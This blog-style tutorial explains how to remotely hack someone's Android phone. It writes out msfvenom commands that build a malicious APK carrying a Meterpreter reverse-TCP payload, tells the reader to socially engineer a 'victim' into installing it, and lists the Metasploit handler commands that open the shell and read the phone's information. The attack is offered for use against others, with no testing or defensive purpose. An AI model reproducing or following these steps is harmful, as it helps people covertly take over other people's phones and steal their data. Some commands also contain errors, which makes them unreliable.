How to hack Android Device remotely

 Hey there! So, if  you want to get remote access to any Android device whether it's A7 or A10 or maybe A11. These are the simple steps to get you access you to any android device


What you need for this? A PC and Metasploit-Framework installed in it. Kali comes with pre-installed Metasploit but if you are on windows and don't have it. Then read this article to learn how to install metasploit framework in windows7/8/10 .

Now, as you have Metasploit-framework, fire up CMD (windows) or Terminal (mac/Linux). Now type these commands to remotely hack android device. 1.ifconfig (mac/Linux) ipconfig (windows).

You will se an output like this, now copy your IP address.



We have to run a server on our machine to receive TCP signals.

Type : 

'service apache2 start' (Linux/mac)

 

in windows, you can use any port forwarding application like ngrok

if you don't know how to use it, read this article about how to port forward in windows .


Now, it's time to create  our malicious .APK file to install in victim's phone and get access to it.

To do so, type this command in CMD or Terminal :

'msfvenom -p android/meterpreter/reverse_tcp lhost=<your_ip_address> lport=4444 r> <your_apk_name.apk>

Wait for a few seconds, and your payload will be created.

Now, it's time to do some social engineering to make our victim believe to install this APK on it's Android device.

Now, the final and last step :

 Type 'msfconsole' in terminal: you'll get an output like this


Now we have to type the following commands

  • use exploit multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp 
  • set lhost <your_ip_addersss>
  • set lport 4444
  • exploit


Boom!!!!! You got access to your victim's phone : 

Now you can type 'help' to see all the commands

I just typed this 'sysinfo' command to get all the information about victim's phone

If you've followed all the steps carefully. You can surely get access to your victim's phone but if you face any errors, just type it in the comments, I'll reply as soon as possible.

Comments

Popular posts from this blog

Best way to hack any social media

How to install metasploit-framework in Windows (7/8/10)